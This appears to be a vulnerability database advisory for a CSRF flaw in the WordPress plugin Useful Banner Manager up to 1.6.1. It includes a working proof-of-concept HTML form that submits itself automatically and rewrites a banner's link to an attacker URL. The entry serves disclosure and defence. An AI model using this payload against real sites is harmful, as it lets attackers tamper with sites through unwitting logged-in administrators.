WordPress Plugin Vulnerabilities
Useful Banner Manager <= 1.6.1 - Modify banners via CSRF
Description
The plugin does not perform CSRF checks on POST requests to its admin page, allowing an attacker to trick a logged in admin to add, modify or delete banners from the plugin by submitting a form.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/admin.php?page=useful-banner-manager%2Fbanners.php&ubm_banner_id=1" method="POST" enctype="multipart/form-data"> <input type="text" name="ubm_banner_name" value="giphy"> <input type="text" name="ubm_banner_type" value="gif"> <input type="file" name="ubm_banner_file" value=""> <input type="text" name="ubm_banner_title" value="test"> <input type="text" name="ubm_banner_alt" value="test"> <input type="text" name="ubm_banner_link" value="https://hacked.com"> <input type="text" name="ubm_link_target" value="_self"> <input type="text" name="ubm_link_rel" value="dofollow"> <input type="text" name="ubm_banner_width" value=""> <input type="text" name="ubm_banner_height" value=""> <input type="text" name="ubm_active_until" value=""> <input type="text" name="ubm_banner_order" value="0"> <input type="text" name="ubm_wrapper_id" value=""> <input type="text" name="ubm_wrapper_class" value=""> <input type="text" name="ubm_is_visible" value="yes"> <input type="text" name="ubm_save_banner" value="Save"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-17 (about 2 years ago)
Added
2022-05-17 (about 2 years ago)
Last Updated
2022-05-18 (about 2 years ago)